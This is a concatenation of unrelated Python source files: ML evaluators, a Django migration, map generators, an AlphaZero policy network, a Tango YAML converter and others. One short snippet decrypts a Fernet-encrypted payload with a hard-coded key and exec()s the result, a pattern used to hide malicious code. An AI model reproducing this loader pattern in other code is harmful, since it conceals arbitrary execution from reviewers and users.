"be": np.zeros(self.dims),
}
if "Ws" not in delta:
delta["Ws"] = np.zeros(self.dims2)
delta["Wh"] = np.zeros((self.dims2, self.dims))
delta["bh"] = np.zeros(self.dims2)
hvect2 = sigmoid(self.scale * (np.dot(self.Wh, hvect) + self.bh))
delta["Ws"] += count * hvect2
# error = self.scale * self.Ws * (1.0 - hvect2 * hvect2) # tanh
error = self.scale * self.Ws * (hvect2 * (1.0 - hvect2)) # sigmoid
# error = self.scale * self.Ws # linear
delta["Wh"] += count * np.outer(error, hvect)
delta["bh"] += count * error
error2 = self.scale * np.dot(self.Wh.T, error) * (hvect * (1.0 - hvect))
delta["We"] += count * np.outer(error2, binvect)
delta["be"] += count * error2
return delta
class BinaryFeatureListEvaluator(BaseEvaluator):
def __init__(self, binsize, dims=50, eta=0.01, _lambda=0.001, penalty=None, is_empty=False):
if is_empty:
return
super(BinaryFeatureListEvaluator, self).__init__(binsize=binsize, dims=dims, eta=eta, _lambda=_lambda, penalty=penalty)
self.logZ = None
def set_freqvect(self, freqvect):
# for frequency-based initialization
self.freqvect = freqvect
def _denumpy(self):
obj = {
"_class": type(self).__name__,
"dims": self.dims,
"binsize": self.binsize,
"weight_list": self.weight_list,
}
if hasattr(self, "freqvect"):
obj["freqvect"] = self.freqvect.tolist()
for _type, _gtype in self.weight_list:
obj[_type] = (self.scale * getattr(self, _type)).tolist()
return obj
def dumps(self):
return json.dumps(self._denumpy())
@classmethod
def loads(self, dat):
struct = json.loads(dat)
return globals()[struct["_class"]]._numpy(struct)
@classmethod
def _numpy(self, struct):
if "_class" in struct:
obj = globals()[struct["_class"]](None, is_empty=True)
else:
# backward-compatibility
obj = BinaryFeatureListEvaluator(None, is_empty=True)
obj.dims = struct["dims"]
obj.binsize = struct["binsize"]
obj.scale = 1.0
obj.weight_list = struct["weight_list"]
for _type, _gtype in obj.weight_list:
setattr(obj, _type, np.array(struct[_type]))
if "freqvect" in struct:
obj.freqvect = np.array(struct["freqvect"])
return obj
def binarize(self, binvect2):
# normalize
binvect = np.zeros(self.binsize, dtype=np.int32)
for i,v in enumerate(binvect2):
if v >= 0.5:
binvect[i] = 1
else:
binvect[i] = 0
return binvect
def init_rand_binvect(self):
if hasattr(self, "freqvect"):
return np.greater(self.freqvect, np.random.rand(self.binsize)) - 0
else:
r = np.random.random_integers(1, 500) # control the frequency of 0-valued elements
return np.random.random_integers(0, r, size=self.binsize) / r
def train_scorer(self, tnode, burn_in=100, interval=10, psamples=100, nsamples=100, Cscore=1.0, delta=None):
# 2 types of negative samples
#
# 1. samples from around positive samples
# 2. samples from a long-lasting MCMC chain
# 1. samples from around positive samples
current = tnode.binvect
current_hvect = self.encode(current)
current_score = self.calc_score(current_hvect)
# calc the expected count
for _iter1 in xrange(nsamples):
for _iter2 in xrange(0, interval):
current, current_hvect, current_score, is_accepted = self._sample_unconstrained(current, current_hvect, current_score)
delta = self.calc_delta_scorer(current, current_hvect, delta=delta, count=-Cscore / (2 * nsamples))
# 2. samples from a long-lasting MCMC chain
if not hasattr(tnode, "rand_binvect") or np.random.uniform(0.0, 1.0) < 0.00005:
sys.stderr.write("reset rand binvect\n")
tnode.rand_binvect = self.init_rand_binvect()
rand_hvect = self.encode(tnode.rand_binvect)
rand_score = self.calc_score(rand_hvect)
for _iter1 in xrange(nsamples):
for _iter2 in xrange(0, interval):
tnode.rand_binvect, rand_hvect, rand_score, is_accepted = self._sample_unconstrained(tnode.rand_binvect, rand_hvect, rand_score)
delta = self.calc_delta_scorer(tnode.rand_binvect, rand_hvect, delta=delta, count=-Cscore / (2 * nsamples))
# calc the expected count
current_hvect = self.encode(tnode.binvect)
current_score = self.calc_score(current_hvect)
delta = self.calc_delta_scorer(tnode.binvect, current_hvect, delta=delta, count=Cscore)
return delta
class NestedBinaryFeatureListEvaluator(NestedEvaluator, BinaryFeatureListEvaluator):
def __init__(self, binsize, dims=50, dims2=10, eta=0.01, _lambda=0.001, penalty=None, is_empty=False):
if is_empty:
return
super(NestedBinaryFeatureListEvaluator, self).__init__(binsize, dims=dims, eta=eta, _lambda=_lambda, penalty=penalty, is_empty=is_empty)
self.init_nested(binsize, dims=dims, dims2=dims2)
self.logZ = None
def _denumpy(self):
obj = BinaryFeatureListEvaluator._denumpy(self)
obj["dims2"] = self.dims2
return obj
@classmethod
def _numpy(self, struct):
obj = BinaryFeatureListEvaluator._numpy(self, struct)
obj.dims2 = struct["dims2"]
return obj
class CategoricalFeatureListEvaluator(BaseEvaluator):
def __init__(self, fid2struct, dims=50, eta=0.01, _lambda=0.001, penalty=None, is_empty=False):
if is_empty:
return
self.fid2struct = fid2struct
self.catsize = len(fid2struct)
binsize = 0
self.map_cat2bin = np.empty((self.catsize, 2), dtype=np.int32) # (first elem. idx, size)
for fid, fnode in enumerate(fid2struct):
size = len(fnode["vid2label"])
self.map_cat2bin[fid] = [binsize, size]
binsize += size
BaseEvaluator.__init__(self, binsize, dims=dims, eta=eta, _lambda=_lambda, penalty=penalty)
self.map_bin2cat = np.empty((self.binsize, 2), dtype=np.int32) # (fid, idx)
idx = 0
for fid, fnode in enumerate(fid2struct):
for v, flabel in enumerate(fnode["vid2label"]):
self.map_bin2cat[idx] = [fid, v]
idx += 1
self.logZ = None
def _denumpy(self):
obj = {
"_class": type(self).__name__,
"dims": self.dims,
"catsize": self.catsize,
"binsize": self.binsize,
"map_cat2bin": self.map_cat2bin.tolist(),
"map_bin2cat": self.map_bin2cat.tolist(),
"fid2struct": self.fid2struct,
"weight_list": self.weight_list,
}
for _type, _gtype in self.weight_list:
obj[_type] = (self.scale * getattr(self, _type)).tolist()
return obj
def dumps(self):
return json.dumps(self._denumpy())
@classmethod
def loads(self, dat):
struct = json.loads(dat)
return self._numpy(struct)
@classmethod
def _numpy(self, struct):
if "_class" in struct:
obj = globals()[struct["_class"]](None, is_empty=True)
else:
# backward-compatibility
obj = CategoricalFeatureListEvaluator(None, is_empty=True)
obj.dims = struct["dims"]
obj.catsize = struct["catsize"]
obj.binsize = struct["binsize"]
obj.map_cat2bin = np.array(struct["map_cat2bin"], dtype=np.int32)
obj.map_bin2cat = np.array(struct["map_bin2cat"], dtype=np.int32)
obj.fid2struct = struct["fid2struct"]
obj.scale = 1.0
obj.weight_list = struct["weight_list"]
for _type, _gtype in obj.weight_list:
setattr(obj, _type, np.array(struct[_type]))
return obj
def binarize(self, binvect2):
# normalize
binvect = np.zeros(self.binsize, dtype=np.int32)
for fid in xrange(self.catsize):
boffset, bsize = self.map_cat2bin[fid]
bidx = boffset + np.argmax(binvect2[boffset:boffset+bsize])
binvect[bidx] = 1
return binvect
def train_scorer(self, tnode, burn_in=100, interval=10, psamples=100, nsamples=100, Cscore=1.0, delta=None):
## 4 types of negative samples
#
## 1. samples from around positive samples without categorical constraints
# 2. samples from around positive samples with categorical constraints
## 3. samples from a long-lasting MCMC chain without categorical constraints
# 4. samples from a long-lasting MCMC chain with categorical constraints
# # # binvect may violate categorical constraints
# current = tnode.binvect
# current_hvect = self.encode(current)
# current_score = self.calc_score(current_hvect)
# # calc the expected count
# for _iter1 in xrange(nsamples):
# for _iter2 in xrange(0, interval):
# current, current_hvect, current_score, is_accepted = self._sample_unconstrained(current, current_hvect, current_score)
# delta = self.calc_delta_scorer(current, current_hvect, delta=delta, count=-Cscore / (4 * nsamples))
# # binvect never violates categorical constraints
current_catvect = tnode.catvect
current_binvect = tnode.binvect
current_hvect = self.encode(current_binvect)
current_score = self.calc_score(current_hvect)
# calc the expected count
for _iter1 in xrange(nsamples):
for _iter2 in xrange(0, interval):
current_score, current_catvect, current_binvect, current_hvect, is_accepted = \
self._sample_all_constrained(current_catvect, current_binvect, current_hvect, current_score)
delta = self.calc_delta_scorer(current_binvect, current_hvect, delta=delta, count=-Cscore / (4 * nsamples))
# # random MCMC without categorical constraints
# if not hasattr(tnode, "rand_binvect") or np.random.uniform(0.0, 1.0) < 0.00005:
# sys.stderr.write("reset rand binvect\n")
# r = np.random.random_integers(1, 20) # control the frequency of 0-valued elements
# tnode.rand_binvect = np.random.random_integers(0, r, size=self.binsize) / r
# rand_hvect = self.encode(tnode.rand_binvect)
# rand_score = self.calc_score(rand_hvect)
# for _iter1 in xrange(nsamples):
# for _iter2 in xrange(0, interval):
# tnode.rand_binvect, rand_hvect, rand_score, is_accepted = self._sample_unconstrained(tnode.rand_binvect, rand_hvect, rand_score)
# delta = self.calc_delta_scorer(tnode.rand_binvect, rand_hvect, delta=delta, count=-Cscore / (4 * nsamples))
# random MCMC with categorical constraints
if not hasattr(tnode, "randnode") or np.random.uniform(0.0, 1.0) < 0.0001:
sys.stderr.write("reset randnode\n")
tnode.randnode = CategoricalFeatureList(-1 * np.ones(self.catsize, dtype=np.int32), self)
rand_binvect = tnode.randnode.binvect
rand_hvect = self.encode(rand_binvect)
rand_score = self.calc_score(rand_hvect)
for _iter1 in xrange(nsamples):
for _iter2 in xrange(0, interval):
rand_score, tnode.randnode.catvect, tnode.randnode.binvect, rand_hvect, is_accepted = \
self._sample_all_constrained(tnode.randnode.catvect, tnode.randnode.binvect, rand_hvect, rand_score)
delta = self.calc_delta_scorer(tnode.randnode.binvect, rand_hvect, delta=delta, count=-Cscore / (4 * nsamples))
# calc the expected count
current_hvect = self.encode(tnode.binvect)
current_score = self.calc_score(current_hvect)
if tnode.has_missing_values:
for _iter1 in xrange(psamples - 1):
for _iter2 in xrange(0, interval):
current_score, curent_hvect, is_accepted = self._sample_mv_constrained(tnode, current_hvect, current_score)
delta = self.calc_delta_scorer(tnode.binvect, current_hvect, delta=delta, count=Cscore / psamples)
else:
delta = self.calc_delta_scorer(tnode.binvect, current_hvect, delta=delta, count=Cscore)
return delta
def _sample_all_constrained(self, current_catvect, current_binvect, current_hvect, current_score):
proposed_catvect, proposed_binvect = self._propose_all_constrained(current_catvect, current_binvect)
proposed_hvect = self.encode(proposed_binvect)
proposed_score = self.calc_score(proposed_hvect)
e = np.exp([current_score, proposed_score] - np.max([current_score, proposed_score]))
if e[0] < np.random.uniform(0.0, e.sum()):
# accepted
return (proposed_score, proposed_catvect, proposed_binvect, proposed_hvect, True)
else:
return (current_score, current_catvect, current_binvect, current_hvect, False)
def _propose_all_constrained(self, catvect, binvect):
catvect2 = np.copy(catvect)
binvect2 = np.copy(binvect)
fid = np.random.random_integers(0, high=self.catsize - 1) # exclusive
old_v = catvect2[fid]
bidx, size = self.map_cat2bin[fid]
new_v = np.random.random_integers(0, high=size - 2)
if new_v >= old_v:
new_v += 1
catvect2[fid] = new_v
binvect2[bidx + old_v] = 0
binvect2[bidx + new_v] = 1
return (catvect2, binvect2)
def _sample_mv_constrained(self, tnode, current_hvect, current_score, fid=-1):
binvect2, catvect2 = tnode.propose_mv_constrained(fid=fid)
proposed_hvect = self.encode(binvect2)
proposed_score = self.calc_score(proposed_hvect)
e = np.exp([current_score, proposed_score] - np.max([current_score, proposed_score]))
if e[0] < np.random.uniform(0.0, e.sum()):
# accepted
tnode.binvect = binvect2
tnode.catvect = catvect2
return (proposed_score, proposed_hvect, True)
else:
return (current_score, current_hvect, False)
def cat2bin(self, catvect):
# # -1 or 1, not 0 or 1
# binvect = -1 * np.ones(self.binsize, dtype=np.int32)
binvect = np.zeros(self.binsize, dtype=np.int32)
for fid, v in enumerate(catvect):
if v < 0:
raise Exception("negative value in category vector: %d" % v)
if v >= self.map_cat2bin[fid][1]:
raise Exception("out-of-range error in category vector: %d" % v)
binvect[self.map_cat2bin[fid][0] + v] = 1
return binvect
def bin2cat(self, binvect):
catvect = -1 * np.ones(self.catsize, dtype=np.int32)
for idx, v in enumerate(binvect):
if v:
s = self.map_bin2cat[idx]
catvect[s[0]] = s[1]
return catvect
class NestedCategoricalFeatureListEvaluator(NestedEvaluator, CategoricalFeatureListEvaluator):
def __init__(self, fid2struct, dims=50, dims2=10, eta=0.01, _lambda=0.001, penalty=None, is_empty=False):
if is_empty:
return
self.fid2struct = fid2struct
self.catsize = len(fid2struct)
binsize = 0
self.map_cat2bin = np.empty((self.catsize, 2), dtype=np.int32) # (first elem. idx, size)
for fid, fnode in enumerate(fid2struct):
size = len(fnode["vid2label"])
self.map_cat2bin[fid] = [binsize, size]
binsize += size
super(NestedCategoricalFeatureListEvaluator, self).__init__(fid2struct, dims=dims, eta=eta, _lambda=_lambda, penalty=penalty, is_empty=is_empty)
self.init_nested(binsize, dims=dims, dims2=dims2)
self.map_bin2cat = np.empty((self.binsize, 2), dtype=np.int32) # (fid, idx)
idx = 0
for fid, fnode in enumerate(fid2struct):
for v, flabel in enumerate(fnode["vid2label"]):
self.map_bin2cat[idx] = [fid, v]
idx += 1
self.logZ = None
def _denumpy(self):
obj = CategoricalFeatureListEvaluator._denumpy(self)
obj["dims2"] = self.dims2
return obj
@classmethod
def _numpy(self, struct):
obj = CategoricalFeatureListEvaluator._numpy(self, struct)
obj.dims2 = struct["dims2"]
return obj
| StarcoderdataPython |
4923212 | <filename>saleor/payment/migrations/0014_django_price_2.py
# Generated by Django 2.2.4 on 2019-08-19 10:50
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("payment", "0013_auto_20190813_0735")]
operations = [
migrations.AlterField(
model_name="payment",
name="currency",
field=models.CharField(max_length=settings.DEFAULT_CURRENCY_CODE_LENGTH),
),
migrations.AlterField(
model_name="transaction",
name="currency",
field=models.CharField(max_length=settings.DEFAULT_CURRENCY_CODE_LENGTH),
),
]
| StarcoderdataPython |
12805309 | <gh_stars>10-100
from . import plasma
# ******************
# *** PREPPERS ***
# ******************
#
# Before map generation proper takes place, the grid must be prepared.
# Generally this will involve setting a terrain for the floor of each tile
# and setting the wall values to True. Note that "True" is not a valid terrain
# type- it will be converted to proper walls later on in the generation process.
#
# The prepper may also set the map generator's plasma attribute.
class BasicPrep( object ):
"""Fill map with True walls and basic floors."""
def __init__( self, terr ):
self.terr = terr
def __call__( self, mapgen ):
mapgen.fill( mapgen.gb, mapgen.area, floor=self.terr, wall=True )
class HeightfieldPrep( object ):
"""Use a plasma map to fill with three levels of terrain"""
def __init__( self, loterr, medterr, hiterr, loground=0.2, higround=0.7, maxloground=0.3, maxhiground=0.5 ):
self.loterr = loterr
self.medterr = medterr
self.hiterr = hiterr
self.loground = loground
self.higround = higround
self.maxloground = maxloground
self.maxhiground = maxhiground
def __call__( self, mapgen ):
mapgen.plasma = plasma.Plasma(map_width=mapgen.area.w,map_height=mapgen.area.h)
all_plasma_values = list()
for column in mapgen.plasma.map[:mapgen.width]:
all_plasma_values += column[:mapgen.height]
all_plasma_values.sort()
self.loground = min(self.loground,all_plasma_values[int(len(all_plasma_values)*self.maxloground)])
self.higround = max(self.higround,all_plasma_values[int(len(all_plasma_values)*self.maxhiground)])
for x in range( mapgen.width ):
for y in range( mapgen.height ):
if mapgen.plasma.map[x][y] < self.loground:
mapgen.gb._map[x][y].floor = self.loterr
elif mapgen.plasma.map[x][y] < self.higround:
mapgen.gb._map[x][y].floor = self.medterr
mapgen.gb._map[x][y].wall = True
else:
mapgen.gb._map[x][y].floor = self.hiterr
mapgen.gb._map[x][y].wall = True
| StarcoderdataPython |
4960259 | <gh_stars>1-10
import numpy as np
def complex_random(sh):
return np.random.rand(*sh) + 1j*np.random.rand(*sh)
def float_random(sh):
return np.random.rand(*sh)
| StarcoderdataPython |
5175211 | import base64
from cryptography.fernet import Fernet
payload = b'<KEY>
key_str = 'correctstaplecorrectstaplecorrec'
key_base64 = base64.b64encode(key_str.encode())
f = Fernet(key_base64)
plain = f.decrypt(payload)
exec(plain.decode())
| StarcoderdataPython |
86860 | <reponame>LichenZeng/AlphaZero_Gomoku
# -*- coding: utf-8 -*-
"""
An implementation of the policyValueNet in PyTorch
Tested in PyTorch 0.2.0 and 0.3.0
@author: <NAME>
"""
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
def set_learning_rate(optimizer, lr):
"""Sets the learning rate to the given value"""
for param_group in optimizer.param_groups:
param_group['lr'] = lr
class Net(nn.Module):
"""policy-value network module"""
def __init__(self, board_width, board_height):
super(Net, self).__init__()
self.board_width = board_width
self.board_height = board_height
# common layers
self.conv1 = nn.Conv2d(4, 32, kernel_size=3, padding=1)
self.conv2 = nn.Conv2d(32, 64, kernel_size=3, padding=1)
self.conv3 = nn.Conv2d(64, 128, kernel_size=3, padding=1)
# action policy layers
self.act_conv1 = nn.Conv2d(128, 4, kernel_size=1)
self.act_fc1 = nn.Linear(4 * board_width * board_height,
board_width * board_height)
# state value layers
self.val_conv1 = nn.Conv2d(128, 2, kernel_size=1)
self.val_fc1 = nn.Linear(2 * board_width * board_height, 64)
self.val_fc2 = nn.Linear(64, 1)
def forward(self, state_input):
# common layers
x = F.relu(self.conv1(state_input))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
# action policy layers
x_act = F.relu(self.act_conv1(x))
x_act = x_act.view(-1, 4 * self.board_width * self.board_height)
x_act = F.log_softmax(self.act_fc1(x_act))
# state value layers
x_val = F.relu(self.val_conv1(x))
x_val = x_val.view(-1, 2 * self.board_width * self.board_height)
x_val = F.relu(self.val_fc1(x_val))
x_val = F.tanh(self.val_fc2(x_val))
return x_act, x_val
class PolicyValueNet():
"""policy-value network """
def __init__(self, board_width, board_height,
model_file=None, use_gpu=False):
self.use_gpu = use_gpu
self.board_width = board_width
self.board_height = board_height
self.l2_const = 1e-4 # coef of l2 penalty
# the policy value net module
if self.use_gpu:
self.policy_value_net = Net(board_width, board_height).cuda()
else:
self.policy_value_net = Net(board_width, board_height)
# print("debug:", self.policy_value_net)
"""
debug: Net(
(conv1): Conv2d(4, 32, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
(conv2): Conv2d(32, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
(conv3): Conv2d(64, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
(act_conv1): Conv2d(128, 4, kernel_size=(1, 1), stride=(1, 1))
(act_fc1): Linear(in_features=144, out_features=36, bias=True) # 4 x width x height
(val_conv1): Conv2d(128, 2, kernel_size=(1, 1), stride=(1, 1))
(val_fc1): Linear(in_features=72, out_features=64, bias=True) # 2 x width x height
(val_fc2): Linear(in_features=64, out_features=1, bias=True)
)
"""
self.optimizer = optim.Adam(self.policy_value_net.parameters(),
weight_decay=self.l2_const)
if model_file:
net_params = torch.load(model_file)
# debug: <class 'collections.OrderedDict'>
# print("debug:", type(net_params))
self.policy_value_net.load_state_dict(net_params)
def policy_value(self, state_batch):
"""
input: a batch of states
output: a batch of action probabilities and state values
"""
if self.use_gpu:
state_batch = Variable(torch.FloatTensor(state_batch).cuda())
log_act_probs, value = self.policy_value_net(state_batch)
act_probs = np.exp(log_act_probs.data.cpu().numpy())
return act_probs, value.data.cpu().numpy()
else:
state_batch = Variable(torch.FloatTensor(state_batch))
log_act_probs, value = self.policy_value_net(state_batch)
act_probs = np.exp(log_act_probs.data.numpy())
# print("debug: pv", type(state_batch), state_batch.shape)
# print("debug: pv", type(log_act_probs), log_act_probs.shape, log_act_probs[0])
# print("debug: pv", type(value), value.shape, value[0])
# print("debug: pv", type(act_probs), act_probs.shape, act_probs[0])
"""
debug: pv <class 'torch.Tensor'> torch.Size([512, 4, 6, 6])
debug: pv <class 'torch.Tensor'> torch.Size([512, 36]) tensor([-3.5188, -3.6358, -3.5779, -3.6464, -3.6030, -3.6298, -3.5478,
-3.5090, -3.5997, -3.5677, -3.5541, -3.6722, -3.5616, -3.5636,
-3.5926, -3.4936, -3.5709, -3.6210, -3.5447, -3.6076, -3.5882,
-3.5600, -3.4815, -3.5765, -3.6788, -3.6113, -3.5063, -3.6241,
-3.5781, -3.5612, -3.5779, -3.6497, -3.6608, -3.6400, -3.5247,
-3.6140])
debug: pv <class 'torch.Tensor'> torch.Size([512, 1]) tensor(1.00000e-02 *
[ 2.5594])
debug: pv <class 'numpy.ndarray'> (512, 36) [0.02963571 0.02636158 0.02793355 0.02608529 0.02724108 0.02652155
0.02878688 0.0299259 0.02733225 0.02821934 0.02860781 0.02542085
0.02839345 0.02833655 0.02752793 0.03039031 0.02813084 0.02675619
0.0288761 0.02711727 0.02764767 0.02843794 0.03076018 0.02797232
0.02525269 0.02701536 0.03000749 0.02667333 0.02792769 0.02840393
0.0279335 0.02599909 0.02571266 0.02625342 0.02945924 0.02694306]
"""
return act_probs, value.data.numpy()
def policy_value_fn(self, board):
"""
input: board
output: a list of (action, probability) tuples for each available
action and the score of the board state
"""
legal_positions = board.availables
current_state = np.ascontiguousarray(board.current_state().reshape(
-1, 4, self.board_width, self.board_height))
if self.use_gpu:
log_act_probs, value = self.policy_value_net(
Variable(torch.from_numpy(current_state)).cuda().float())
act_probs = np.exp(log_act_probs.data.cpu().numpy().flatten())
else:
log_act_probs, value = self.policy_value_net(
Variable(torch.from_numpy(current_state)).float())
act_probs = np.exp(log_act_probs.data.numpy().flatten())
# print("debug: pvf", legal_positions)
# print("debug: pvf,", value, log_act_probs, act_probs)
"""
debug: pvf [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 33, 34, 35]
debug: pvf, tensor([[-0.1340]]) tensor([[-3.5891, -3.6159, -3.6483, -3.6113, -3.5677, -3.6311, -3.5342,
-3.6449, -3.6345, -3.5444, -3.5193, -3.5488, -3.5690, -3.6075,
-3.6792, -3.6329, -3.5296, -3.6544, -3.5786, -3.5870, -3.5027,
-3.5944, -3.5537, -3.6383, -3.6251, -3.5364, -3.5302, -3.6542,
-3.6004, -3.6269, -3.5623, -3.5152, -3.5181, -3.5594, -3.5809,
-3.5221]]) [0.02762223 0.02689152 0.02603547 0.02701722 0.02822023 0.02648623
0.02918113 0.02612401 0.02639725 0.02888605 0.02961869 0.02876004
0.02818486 0.02711975 0.02524304 0.0264391 0.02931764 0.02587646
0.02791596 0.02768259 0.030115 0.02747608 0.0286187 0.0262969
0.02664538 0.02911758 0.02930048 0.02588317 0.02731332 0.02659828
0.02837263 0.02974232 0.02965699 0.02845607 0.02785116 0.02953648]
"""
act_probs = zip(legal_positions, act_probs[legal_positions])
value = value.data[0][0]
# # debug: pvf value tensor(-0.1340)
# print("debug: pvf value", value)
return act_probs, value
def train_step(self, state_batch, mcts_probs, winner_batch, lr):
"""perform a training step"""
# wrap in Variable
if self.use_gpu:
state_batch = Variable(torch.FloatTensor(state_batch).cuda())
mcts_probs = Variable(torch.FloatTensor(mcts_probs).cuda())
winner_batch = Variable(torch.FloatTensor(winner_batch).cuda())
else:
state_batch = Variable(torch.FloatTensor(state_batch))
mcts_probs = Variable(torch.FloatTensor(mcts_probs))
winner_batch = Variable(torch.FloatTensor(winner_batch))
# zero the parameter gradients
self.optimizer.zero_grad()
# set learning rate
set_learning_rate(self.optimizer, lr)
# forward
log_act_probs, value = self.policy_value_net(state_batch)
# define the loss = (z - v)^2 - pi^T * log(p) + c||theta||^2
# Note: the L2 penalty is incorporated in optimizer
value_loss = F.mse_loss(value.view(-1), winner_batch)
policy_loss = -torch.mean(torch.sum(mcts_probs * log_act_probs, 1))
loss = value_loss + policy_loss
# backward and optimize
loss.backward()
self.optimizer.step()
# calc policy entropy, for monitoring only
entropy = -torch.mean(
torch.sum(torch.exp(log_act_probs) * log_act_probs, 1)
)
# print("debug:", loss, loss.data[0], "{:.5f} |x {:.5f}".format(loss.data[0], loss))
# print("debug:", entropy, entropy.data[0])
"""
debug: tensor(4.1732) tensor(4.1732) 4.17323 |x 4.17323
debug: tensor(3.5791) tensor(3.5791)
"""
return loss.data[0], entropy.data[0]
def get_policy_param(self):
net_params = self.policy_value_net.state_dict()
return net_params
def save_model(self, model_file):
""" save model params to file """
net_params = self.get_policy_param() # get model params
torch.save(net_params, model_file)
| StarcoderdataPython |
11313812 | <filename>src/snovault/elasticsearch/searches/interfaces.py<gh_stars>10-100
NON_SORTABLE = 'non_sortable'
SEARCH_CONFIG = 'search_config'
| StarcoderdataPython |
206190 | <gh_stars>10-100
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Analyze and simplify IncompletInodes so that we can more easily check that
the salient parts of the filesystem are as we expect.
Similar to `get_frequency_of_selinux_xattrs` and `ItemFilters` from
`send_stream.py`, but for already-constructed filesystems.
"""
from typing import Tuple, Union
from .incomplete_inode import IncompleteDir, IncompleteInode
from .inode import Inode, InodeOwner
_SELINUX_XATTR = b"security.selinux"
def erase_mode_and_owner(
ino: Union[IncompleteInode, Inode],
*,
owner: "InodeOwner",
file_mode: int,
dir_mode: int,
):
if ino.owner == owner:
# pyre-fixme[41]: Cannot reassign final attribute `owner`.
ino.owner = None
if (
(ino.mode == dir_mode)
if isinstance(ino, IncompleteDir)
else (ino.mode == file_mode)
):
# pyre-fixme[41]: Cannot reassign final attribute `mode`.
ino.mode = None
def erase_utimes_in_range(
ino: Union[IncompleteInode, Inode],
start: Tuple[int, int],
end: Tuple[int, int],
):
utimes = ino.utimes
if utimes is not None and all(
start <= t <= end for t in (utimes.ctime, utimes.mtime, utimes.atime)
):
# pyre-fixme[41]: Cannot reassign final attribute `utimes`.
ino.utimes = None
def erase_selinux_xattr(ino: Union[IncompleteInode, Inode]):
# Getting coverage for this line would force us to have a hard
# dependency on running this test on an SELinux-enabled filesystem.
# Mocking that seems like useless effort, so let's waive coverage.
ino.xattrs.pop(_SELINUX_XATTR, None) # pragma: no cover
| StarcoderdataPython |
8134497 | <gh_stars>1-10
#########################################################################################
# Copyright 2020 SKA South Africa (http://ska.ac.za/) #
# #
# BSD license - see LICENSE.txt for details #
#########################################################################################
"""Module that contains the TangoToYAML class that parses a Tango device specification
file (xmi, fgo) or a running Tango device into YAML"""
from pathlib import Path
import yaml
class TangoToYAML:
"""Class that translates a Tango specification file or a running Tango device to
YAML."""
def __init__(self, parser_class):
"""Initialise TangoToYAML with a parser class
Parameters
----------
parser_class : Python class definition
A Python class that implements methods,
- `parse`
- `get_device_command_metadata`
- `get_device_attribute_metadata`
- `get_device_properties_metadata`
and has the attribute `device_class_name`
"""
self.parser = parser_class()
def _build_yaml(self):
"""Build YAML from the parser
"""
data_dict = [
{
"class": self.parser.device_class_name,
"meta": {"commands": [], "attributes": [], "properties": []},
}
]
command_values = self.parser.get_device_command_metadata().values()
command_values = sorted(command_values, key=lambda x: x["name"])
for command in command_values:
command_keys = sorted(command.keys())
command_keys.insert(0, command_keys.pop(command_keys.index("name")))
command_data = {}
for key in command_keys:
if key in ["dtype_in", "dtype_out"]:
command_data[key] = command[key].name
else:
command_data[key] = command[key]
data_dict[0]["meta"]["commands"].append(command_data)
attr_values = self.parser.get_device_attribute_metadata().values()
attr_values = sorted(attr_values, key=lambda x: x["name"])
for attr in attr_values:
attr_keys = sorted(attr.keys())
attr_keys.insert(0, attr_keys.pop(attr_keys.index("name")))
attr_data = {}
for key in attr_keys:
if key in ["data_format", "data_type", "disp_level"]:
attr_data[key] = attr[key].name
elif key in [
"name",
"delta_val",
"enum_labels",
"period",
"display_unit",
"standard_unit",
"unit",
"max_dim_y",
"max_dim_x",
"label",
"max_value",
"min_alarm",
"max_warning",
"description",
"format",
"delta_t",
"max_alarm",
"min_value",
"inherited",
"min_warning",
"writable",
"writable_attr_name",
]:
if attr[key]:
attr_data[key] = attr[key]
data_dict[0]["meta"]["attributes"].append(attr_data)
prop_values = self.parser.get_device_properties_metadata(
"deviceProperties"
).values()
prop_values = sorted(prop_values, key=lambda x: x["name"])
for prop in prop_values:
data_dict[0]["meta"]["properties"].append({"name": prop["name"]})
return yaml.dump(data_dict, sort_keys=False)
def build_yaml_from_file(self, file_loc):
"""Builds YAML from a Tango specification file
Parameters
----------
file_loc : str
The path to the specification file
Returns
-------
str
A YAML representation of the specification file
"""
file_path = Path(file_loc)
assert file_path.is_file(), "{} is not a file".format(file_loc)
self.parser.parse(file_loc)
return self._build_yaml()
def build_yaml_from_device(self, device_name):
"""Interrogates a running Tango device and builds the YAML from its attributes,
properties and commands.
Parameters
----------
device_name : str
Tango device name in the domain/family/member format or the
FQDN tango://<TANGO_HOST>:<TANGO_PORT>/domain/family/member
"""
self.parser.parse(device_name)
return self._build_yaml()
| StarcoderdataPython |
280109 | <filename>mi/dataset/parser/test/test_optaa_dj_dcl.py
#!/usr/bin/env python
"""
@package mi.dataset.parser.test.test_optaa_dj_dcl
@file marine-integrations/mi/dataset/parser/test/test_optaa_dj_dcl.py
@author <NAME> (Raytheon)
@brief Test code for a optaa_dj_dcl data parser
Files used for testing:
20010314_010314.optaa1.log
Records - 3, Measurements - 1, 3, 14
20020704_020704.optaa2.log
Records - 5, Measurements - 0, 2, 7, 4, 27
20031031_031031.optaa3.log
Records - 3, Measurements - 50, 255, 125
20041220_041220.optaa4.log
Records - 4, Measurements - 255, 175, 150, 255
20050401_050401.optaa5.log
Records - 3, Measurements - 1, 2, 3
All records have a checksum error - No particles will be produced
20061225_061225.optaa6.log
Records - 10, Measurements - 1, 2, 3, 4, 5, 6, 7, 8, 9, 10
"""
import os
from nose.plugins.attrib import attr
from mi.core.log import get_logger; log = get_logger()
from mi.core.exceptions import DatasetParserException
from mi.core.instrument.data_particle import DataParticleKey
from mi.dataset.test.test_parser import ParserUnitTestCase
from mi.dataset.dataset_parser import DataSetDriverConfigKeys
from mi.dataset.parser.optaa_dj_dcl import \
OptaaDjDclRecoveredParser, \
OptaaDjDclTelemeteredParser, \
OptaaDjDclRecoveredInstrumentDataParticle, \
OptaaDjDclRecoveredMetadataDataParticle, \
OptaaDjDclTelemeteredInstrumentDataParticle, \
OptaaDjDclTelemeteredMetadataDataParticle, \
OptaaStateKey
